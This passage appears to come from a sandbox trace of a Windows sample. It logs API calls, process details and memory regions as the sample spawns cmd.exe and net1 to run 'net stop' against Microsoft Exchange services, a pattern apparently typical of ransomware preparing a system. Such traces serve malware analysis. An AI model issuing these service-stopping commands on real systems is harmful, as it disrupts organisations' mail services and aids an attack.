_String2="UPS") returned -8 [0141.409] _wcsicmp (_String1="MSEXCHANGETHROTTLING", _String2="UPS") returned -8 [0141.409] _wcsicmp (_String1="MSEXCHANGETHROTTLING", _String2="XACTSRV") returned -11 [0141.409] _wcsicmp (_String1="MSEXCHANGETHROTTLING", _String2="XACTSRV") returned -11 [0141.409] _wcsicmp (_String1="MSEXCHANGETHROTTLING", _String2="TCPIP") returned -7 [0141.409] _wcsicmp (_String1="MSEXCHANGETHROTTLING", _String2="TCPIP") returned -7 [0141.409] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x4b6ca0 [0141.409] OpenServiceW (hSCManager=0x4b6ca0, lpServiceName="MSEXCHANGETHROTTLING", dwDesiredAccess=0x84) returned 0x0 [0141.410] GetLastError () returned 0x424 [0141.410] CloseServiceHandle (hSCObject=0x4b6ca0) returned 1 [0141.410] wcscpy_s (in: _Destination=0x10a7698, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0141.410] LoadLibraryW (lpLibFileName="NETMSG") returned 0x360000 [0141.410] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x360000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x10a7ca8, nSize=0x800, Arguments=0x10a7450 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0141.411] GetFileType (hFile=0x40) returned 0x2 [0141.411] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0x26f538 | out: lpMode=0x26f538) returned 1 [0141.412] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x10a7ca8*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x26f544, lpReserved=0x0 | out: lpBuffer=0x10a7ca8*, lpNumberOfCharsWritten=0x26f544*=0x1e) returned 1 [0141.412] GetFileType (hFile=0x40) returned 0x2 [0141.412] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0x26f538 | out: lpMode=0x26f538) returned 1 [0141.412] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x1081250*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x26f544, lpReserved=0x0 | out: lpBuffer=0x1081250*, lpNumberOfCharsWritten=0x26f544*=0x2) returned 1 [0141.412] _ultow (in: _Dest=0x889, _Radix=2553176 | out: _Dest=0x889) returned="2185" [0141.412] FormatMessageW (in: dwFlags=0x2800, lpSource=0x360000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x10a7ca8, nSize=0x800, Arguments=0x10a7450 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0141.412] GetFileType (hFile=0x40) returned 0x2 [0141.412] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0x26f528 | out: lpMode=0x26f528) returned 1 [0141.413] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x10a7ca8*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x26f534, lpReserved=0x0 | out: lpBuffer=0x10a7ca8*, lpNumberOfCharsWritten=0x26f534*=0x34) returned 1 [0141.413] GetFileType (hFile=0x40) returned 0x2 [0141.413] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0x26f528 | out: lpMode=0x26f528) returned 1 [0141.413] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x1081250*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x26f534, lpReserved=0x0 | out: lpBuffer=0x1081250*, lpNumberOfCharsWritten=0x26f534*=0x2) returned 1 [0141.413] NetApiBufferFree (Buffer=0x4b8048) returned 0x0 [0141.413] NetApiBufferFree (Buffer=0x4b7fd0) returned 0x0 [0141.413] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSExchangeThrottling" [0141.413] exit (_Code=2) Thread: id = 766 os_tid = 0xdac Process: id = "265" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x2a8ca000" os_pid = "0xd60" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c net stop MSExchangeTransport" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12580 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 12581 start_va = 0xee0000 end_va = 0x4edffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ee0000" filename = "" Region: id = 12582 start_va = 0x4ee0000 end_va = 0x4efffff entry_point = 0x0 region_type = private name = "private_0x0000000004ee0000" filename = "" Region: id = 12583 start_va = 0x4f00000 end_va = 0x4f00fff entry_point = 0x0 region_type = private name = "private_0x0000000004f00000" filename = "" Region: id = 12584 start_va = 0x4f10000 end_va = 0x4f23fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004f10000" filename = "" Region: id = 12585 start_va = 0x4f30000 end_va = 0x4f6ffff entry_point = 0x0 region_type = private name = "private_0x0000000004f30000" filename = "" Region: id = 12586 start_va = 0x4f70000 end_va = 0x506ffff entry_point = 0x0 region_type = private name = "private_0x0000000004f70000" filename = "" Region: id = 12587 start_va = 0x5070000 end_va = 0x5073fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005070000" filename = "" Region: id = 12588 start_va = 0x5080000 end_va = 0x5080fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005080000" filename = "" Region: id = 12589 start_va = 0x5090000 end_va = 0x5091fff entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 12590 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 12591 start_va = 0x7f530000 end_va = 0x7f552fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f530000" filename = "" Region: id = 12592 start_va = 0x7f558000 end_va = 0x7f55afff entry_point = 0x0 region_type = private name = "private_0x000000007f558000" filename = "" Region: id = 12593 start_va = 0x7f55b000 end_va = 0x7f55bfff entry_point = 0x0 region_type = private name = "private_0x000000007f55b000" filename = "" Region: id = 12594 start_va = 0x7f55d000 end_va = 0x7f55dfff entry_point = 0x0 region_type = private name = "private_0x000000007f55d000" filename = "" Region: id = 12595 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 12596 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 12597 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 12598 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12599 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 12600 start_va = 0x5220000 end_va = 0x522ffff entry_point = 0x0 region_type = private name = "private_0x0000000005220000" filename = "" Region: id = 12601 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 12602 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 12603 start_va = 0x5300000 end_va = 0x53fffff entry_point = 0x0 region_type = private name = "private_0x0000000005300000" filename = "" Region: id = 12604 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 12645 start_va = 0x4ee0000 end_va = 0x4eeffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004ee0000" filename = "" Region: id = 12646 start_va = 0x50a0000 end_va = 0x515dfff entry_point = 0x50a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12647 start_va = 0x5160000 end_va = 0x519ffff entry_point = 0x0 region_type = private name = "private_0x0000000005160000" filename = "" Region: id = 12648 start_va = 0x52c0000 end_va = 0x52cffff entry_point = 0x0 region_type = private name = "private_0x00000000052c0000" filename = "" Region: id = 12649 start_va = 0x5400000 end_va = 0x54fffff entry_point = 0x0 region_type = private name = "private_0x0000000005400000" filename = "" Region: id = 12650 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 12651 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 12652 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 12653 start_va = 0x7f430000 end_va = 0x7f52ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f430000" filename = "" Region: id = 12654 start_va = 0x7f555000 end_va = 0x7f557fff entry_point = 0x0 region_type = private name = "private_0x000000007f555000" filename = "" Region: id = 12655 start_va = 0x4ef0000 end_va = 0x4ef3fff entry_point = 0x0 region_type = private name = "private_0x0000000004ef0000" filename = "" Region: id = 12656 start_va = 0x4f00000 end_va = 0x4f03fff entry_point = 0x0 region_type = private name = "private_0x0000000004f00000" filename = "" Region: id = 12657 start_va = 0x5500000 end_va = 0x5836fff entry_point = 0x5500000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 767 os_tid = 0xd7c [0141.898] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0141.898] __set_app_type (_Type=0x1) [0141.898] __p__fmode () returned 0x77ac4d6c [0141.898] __p__commode () returned 0x77ac5b1c [0141.898] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0141.899] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0141.899] GetCurrentThreadId () returned 0xd7c [0141.899] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd7c) returned 0x84 [0141.899] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0141.899] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0141.899] SetThreadUILanguage (LangId=0x0) returned 0x409 [0141.949] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0141.949] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x506f9b0 | out: phkResult=0x506f9b0*=0x0) returned 0x2 [0141.949] VirtualQuery (in: lpAddress=0x506f9b7, lpBuffer=0x506f968, dwLength=0x1c | out: lpBuffer=0x506f968*(BaseAddress=0x506f000, AllocationBase=0x4f70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.949] VirtualQuery (in: lpAddress=0x4f70000, lpBuffer=0x506f968, dwLength=0x1c | out: lpBuffer=0x506f968*(BaseAddress=0x4f70000, AllocationBase=0x4f70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0141.949] VirtualQuery (in: lpAddress=0x4f71000, lpBuffer=0x506f968, dwLength=0x1c | out: lpBuffer=0x506f968*(BaseAddress=0x4f71000, AllocationBase=0x4f70000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0141.949] VirtualQuery (in: lpAddress=0x4f73000, lpBuffer=0x506f968, dwLength=0x1c | out: lpBuffer=0x506f968*(BaseAddress=0x4f73000, AllocationBase=0x4f70000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.949] VirtualQuery (in: lpAddress=0x5070000, lpBuffer=0x506f968, dwLength=0x1c | out: lpBuffer=0x506f968*(BaseAddress=0x5070000, AllocationBase=0x5070000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0141.949] GetConsoleOutputCP () returned 0x1b5 [0141.970] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0141.970] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0141.970] _get_osfhandle (_FileHandle=1) returned 0x3c [0141.970] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0141.972] _get_osfhandle (_FileHandle=1) returned 0x3c [0141.972] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0141.976] _get_osfhandle (_FileHandle=1) returned 0x3c [0141.976] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0141.981] _get_osfhandle (_FileHandle=0) returned 0x38 [0141.981] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0141.985] _get_osfhandle (_FileHandle=0) returned 0x38 [0141.985] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0141.986] GetEnvironmentStringsW () returned 0x5307d70* [0141.986] FreeEnvironmentStringsA (penv="A") returned 1 [0141.986] GetEnvironmentStringsW () returned 0x5307d70* [0141.986] FreeEnvironmentStringsA (penv="A") returned 1 [0141.986] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x506e914 | out: phkResult=0x506e914*=0x94) returned 0x0 [0141.986] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x506e918, lpData=0x506e920, lpcbData=0x506e91c*=0x1000 | out: lpType=0x506e918*=0x0, lpData=0x506e920*=0xc0, lpcbData=0x506e91c*=0x1000) returned 0x2 [0141.986] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x506e918, lpData=0x506e920, lpcbData=0x506e91c*=0x1000 | out: lpType=0x506e918*=0x4, lpData=0x506e920*=0x1, lpcbData=0x506e91c*=0x4) returned 0x0 [0141.986] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x506e918, lpData=0x506e920, lpcbData=0x506e91c*=0x1000 | out: lpType=0x506e918*=0x0, lpData=0x506e920*=0x1, lpcbData=0x506e91c*=0x1000) returned 0x2 [0141.986] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x506e918, lpData=0x506e920, lpcbData=0x506e91c*=0x1000 | out: lpType=0x506e918*=0x4, lpData=0x506e920*=0x0, lpcbData=0x506e91c*=0x4) returned 0x0 [0141.986] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x506e918, lpData=0x506e920, lpcbData=0x506e91c*=0x1000 | out: lpType=0x506e918*=0x4, lpData=0x506e920*=0x40, lpcbData=0x506e91c*=0x4) returned 0x0 [0141.986] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x506e918, lpData=0x506e920, lpcbData=0x506e91c*=0x1000 | out: lpType=0x506e918*=0x4, lpData=0x506e920*=0x40, lpcbData=0x506e91c*=0x4) returned 0x0 [0141.986] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x506e918, lpData=0x506e920, lpcbData=0x506e91c*=0x1000 | out: lpType=0x506e918*=0x0, lpData=0x506e920*=0x40, lpcbData=0x506e91c*=0x1000) returned 0x2 [0141.986] RegCloseKey (hKey=0x94) returned 0x0 [0141.987] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x506e914 | out: phkResult=0x506e914*=0x94) returned 0x0 [0141.987] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x506e918, lpData=0x506e920, lpcbData=0x506e91c*=0x1000 | out: lpType=0x506e918*=0x0, lpData=0x506e920*=0x40, lpcbData=0x506e91c*=0x1000) returned 0x2 [0141.987] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x506e918, lpData=0x506e920, lpcbData=0x506e91c*=0x1000 | out: lpType=0x506e918*=0x4, lpData=0x506e920*=0x1, lpcbData=0x506e91c*=0x4) returned 0x0 [0141.987] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x506e918, lpData=0x506e920, lpcbData=0x506e91c*=0x1000 | out: lpType=0x506e918*=0x0, lpData=0x506e920*=0x1, lpcbData=0x506e91c*=0x1000) returned 0x2 [0141.987] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x506e918, lpData=0x506e920, lpcbData=0x506e91c*=0x1000 | out: lpType=0x506e918*=0x4, lpData=0x506e920*=0x0, lpcbData=0x506e91c*=0x4) returned 0x0 [0141.987] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x506e918, lpData=0x506e920, lpcbData=0x506e91c*=0x1000 | out: lpType=0x506e918*=0x4, lpData=0x506e920*=0x9, lpcbData=0x506e91c*=0x4) returned 0x0 [0141.987] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x506e918, lpData=0x506e920, lpcbData=0x506e91c*=0x1000 | out: lpType=0x506e918*=0x4, lpData=0x506e920*=0x9, lpcbData=0x506e91c*=0x4) returned 0x0 [0141.987] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x506e918, lpData=0x506e920, lpcbData=0x506e91c*=0x1000 | out: lpType=0x506e918*=0x0, lpData=0x506e920*=0x9, lpcbData=0x506e91c*=0x1000) returned 0x2 [0141.987] RegCloseKey (hKey=0x94) returned 0x0 [0141.987] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad2983e [0141.987] srand (_Seed=0x5ad2983e) [0141.987] GetCommandLineW () returned="/c net stop MSExchangeTransport" [0141.987] GetCommandLineW () returned="/c net stop MSExchangeTransport" [0141.987] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0141.987] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x5309cc8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0141.987] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0141.987] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0141.987] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0141.987] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0141.987] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0141.987] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0141.987] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0141.987] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0141.987] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0141.987] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0141.988] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0141.988] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0141.988] GetEnvironmentStringsW () returned 0x5307d70* [0141.988] FreeEnvironmentStringsA (penv="A") returned 1 [0141.988] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0141.988] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0141.988] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0141.988] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0141.988] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0141.988] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0141.988] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0141.988] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0141.988] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0141.988] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0141.988] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x506f6ec | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0141.988] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x506f6ec, lpFilePart=0x506f6e4 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x506f6e4*="Desktop") returned 0x1d [0141.988] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0141.988] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x506f468 | out: lpFindFileData=0x506f468) returned 0x53005c8 [0141.988] FindClose (in: hFindFile=0x53005c8 | out: hFindFile=0x53005c8) returned 1 [0141.989] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x506f468 | out: lpFindFileData=0x506f468) returned 0x53005c8 [0141.989] FindClose (in: hFindFile=0x53005c8 | out: hFindFile=0x53005c8) returned 1 [0141.989] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0141.989] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x506f468 | out: lpFindFileData=0x506f468) returned 0x53005c8 [0141.989] FindClose (in: hFindFile=0x53005c8 | out: hFindFile=0x53005c8) returned 1 [0141.989] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0141.989] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0141.989] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0141.989] GetEnvironmentStringsW () returned 0x5307d70* [0141.989] FreeEnvironmentStringsA (penv="=") returned 1 [0141.989] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0141.990] GetConsoleOutputCP () returned 0x1b5 [0141.996] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0141.996] GetUserDefaultLCID () returned 0x409 [0141.996] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0141.996] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x506f81c, cchData=128 | out: lpLCData="0") returned 2 [0141.996] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x506f81c, cchData=128 | out: lpLCData="0") returned 2 [0141.996] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x506f81c, cchData=128 | out: lpLCData="1") returned 2 [0141.996] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0141.996] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0141.996] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0141.996] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0141.996] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0141.996] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0141.996] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0141.996] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0141.996] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0141.996] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0141.996] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0141.997] GetConsoleTitleW (in: lpConsoleTitle=0x530a9f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0141.999] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0142.000] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0142.000] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0142.000] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0142.000] _wcsicmp (_String1="net", _String2=")") returned 69 [0142.000] _wcsicmp (_String1="FOR", _String2="net") returned -8 [0142.000] _wcsicmp (_String1="FOR/?", _String2="net") returned -8 [0142.000] _wcsicmp (_String1="IF", _String2="net") returned -5 [0142.000] _wcsicmp (_String1="IF/?", _String2="net") returned -5 [0142.000] _wcsicmp (_String1="REM", _String2="net") returned 4 [0142.000] _wcsicmp (_String1="REM/?", _String2="net") returned 4 [0142.001] GetConsoleTitleW (in: lpConsoleTitle=0x506f508, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0142.001] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0142.001] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0142.001] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0142.001] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0142.001] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0142.001] _wcsicmp (_String1="net", _String2="CD") returned 11 [0142.001] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0142.001] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0142.001] _wcsicmp (_String1="net", _String2="REN") returned -4 [0142.001] 